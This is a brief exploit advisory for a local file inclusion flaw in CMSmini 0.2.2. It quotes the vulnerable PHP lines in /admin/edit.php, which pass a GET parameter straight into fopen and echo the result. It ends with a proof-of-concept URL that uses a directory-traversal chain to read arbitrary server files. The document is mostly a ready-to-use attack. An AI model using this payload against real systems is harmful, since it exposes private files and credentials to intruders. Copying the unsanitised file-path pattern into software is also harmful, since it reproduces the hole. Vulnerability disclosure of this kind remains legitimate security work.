# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]
 
--------------------------------------------------
 
/admin/edit.php
 
30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;
 
---------------------------------------------------
 
POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]